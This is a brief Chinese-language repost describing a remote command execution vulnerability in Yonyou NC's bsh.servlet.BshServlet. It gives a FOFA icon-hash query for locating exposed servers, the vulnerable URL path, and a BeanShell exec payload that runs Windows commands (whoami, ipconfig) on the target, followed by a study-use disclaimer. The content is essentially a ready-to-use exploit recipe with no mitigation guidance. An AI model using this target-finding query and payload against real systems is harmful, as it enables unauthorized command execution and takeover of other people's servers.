用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限
FOFA:
icon_hash="1085941792"
漏洞Url为
/servlet/~ic/bsh.servlet.BshServlet
执行
exec("cmd.exe /c whoami&&ipconfig")
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。